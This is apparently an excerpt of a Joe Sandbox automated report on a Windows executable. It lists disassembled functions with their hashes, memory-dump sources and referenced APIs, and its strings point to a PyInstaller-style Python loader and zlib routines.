• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: ec10dbd66422ca27fc0225f291d354a09a4ba7456042b811a98854b9adaadf99
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: 74419622D187C283E768AB2095503B9A3A0FB94794F509335E67C03ED1DF7CA5F187A0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction ID: ca1fae4b14fc585a347e055649a00323b0caa5b68d0e0ecf03e974bd0acde9c5
• Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
• Instruction Fuzzy Hash: FD313760E096C351FB24BB2594653F9AB92BF41784FC44634D97E4B2D3EE2CA409C2F0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
• Instruction ID: db12c1a4249d1ec308ab5f48d1858cd141796b67297f7cd5fbbcd5117e5a6e2f
• Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D09E10F097C652EB283F705C990F8A651AF48745F941638C83B073E3ED6CA45943E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction ID: 0951bbb32cb433a8f0e7dd39feeb2b44c16743efb6b602f6ce011d5190385592
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0451E321B092D286FB7CAA7594006FAE691AF44BA4F984B34DE7C437C5CF3CE40586A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                      • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction ID: 7c911afd9b13035e3bb5ab13be8b67c065dd9d35f6a1949ead0e784c2689afca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E3A1B18AC281DB24AB25A8441A9E761FB45BF4F944331EE7E4B7E9CF7CD0118790
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                      • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction ID: 8def72dcd44552952c8c5b4efc295f34883e1e8278225513b2ff387a4d26758e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE04F10E0968252FF287BF294951B996506F85740B854230C83D832E2DE2C689582F0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC36
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF59AA45,?,?,00000000,00007FF7FF59AAFA), ref: 00007FF7FF59AC40
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 918212764-0
                                                                                                                                                                                                      • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction ID: 71b7341e872857e837700a200d64cfe775ea603b681a6c97d05e0d0b5d33e6f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED21A411B1C6C241EFB877A194902F9A2829F84790FD84375E93E4B7D2CE6CE44583F0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction ID: 86453121177c381cf5bc730092f354509d3598680ca3531b394511a52951a636
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD41D73290868687FB38AB16A5442BDB7A4EB55B44F901331D6BE436D1CF2DE502CBF1
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
• Instruction ID: 0ef530b5c66d8333b0de49c4743448113597bf5d41f0ae2a2c35713b507af1c4
• Opcode Fuzzy Hash: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
• Instruction Fuzzy Hash: B7219E21B486D285EB64BA2269043FAEA51FF45BD4FC85530EE3D0B7C6CE3DE045C6A4
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction ID: 4db6ddd0342bbc456bf5ac2bef59305e82959790f2699d77c2fcfc09f1e02d68
• Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
• Instruction Fuzzy Hash: FC319C31A186C695F7697B5588813FCA660AB40B94FC64335E93D033E2CFBCE94187B0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0
• Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction ID: 77e3f25fc3631df90c6934c1dd0cc6b5953e21149806ae3f2f42af8d86b9aa42
• Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
• Instruction Fuzzy Hash: 23218E72A057828AEB28AF64C4442EC77A5FB44718F841739D63D07AD5DF38D984C7A0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: ea438a866be39f56569a56d08e4e1f71a6e21f40d625983e6fb0b0e994b4ef63
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: 81113062A1868241EB78BF5194002FEE2A4AF45F90FC44231EB7C57AD6DF3DD45187E1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction ID: ccb0a3abd6f52daee80d05edc2e95a7ced09e41fb20fb9d32e20ce6d93c1a481
• Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
• Instruction Fuzzy Hash: 9221D772608AC286D760AF18D4803B9B6A0FB84F54F944335E6BE876D5DF3CD4118B50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 500166a5650fe92580b8071ade264c7eb2e3d94f3392d6ef0fedb682d5cb0fdf
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 1401A521A08B8141EB28EF6259010A9E695BF86FE0F884B31DE7C57BD6CE3CE4114350
APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7FF590D00,?,?,?,00007FF7FF59236A,?,?,?,?,?,00007FF7FF593B59), ref: 00007FF7FF59D6AA
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction ID: 2873f2212832c7c6d3179c13600a18cdd484f53727a6a91f3405df183929c501
• Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
• Instruction Fuzzy Hash: 67F03415E0D28645FF787A7198516F992904F95BA0F884330997E873D2EE2CA48082B0
APIs
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585830
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585842
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585879
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58588B
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858A4
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858B6
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858CF
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858E1
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5858FD
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58590F
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58592B
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58593D
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585959
• GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF58596B
• GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585987
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF585999
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859B5
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF5864BF,?,00007FF7FF58336E), ref: 00007FF7FF5859C7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressErrorLastProc
                                                                                                                                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                      • API String ID: 199729137-653951865
                                                                                                                                                                                                      • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction ID: bd9b1a2efc8007b7e2a5e0ca7d31ad65ae96febdde4dc04b6c5a29345f16109f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC228164A0AB8791FB15BB65A8141F4A7A0BF05B55FD55236C83E032E0FF3CA568C2F0
APIs
Strings
Similarity
• API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 808467561-2761157908
• Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction ID: 7fa8fa7d17d77a76ab597245addec6bd60770b543e87efa53057a6bb7910082f
• Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
• Instruction Fuzzy Hash: 21B20672A192C28BE7249FA4D480BFDB7A1FB45744F805235DA3D57AD8DF38A910CB90
Strings
Similarity
• API ID:
• String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
• API String ID: 0-2665694366
• Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction ID: 899cbd6a794aea12dd8489579677d658fe8b8d257725f069028a8b4a1f20b1e9
• Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
• Instruction Fuzzy Hash: F452E372A186E59BE7A49F14C458ABE7BADFB44340F414238E66A877D0DF3CD844CB90
APIs
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
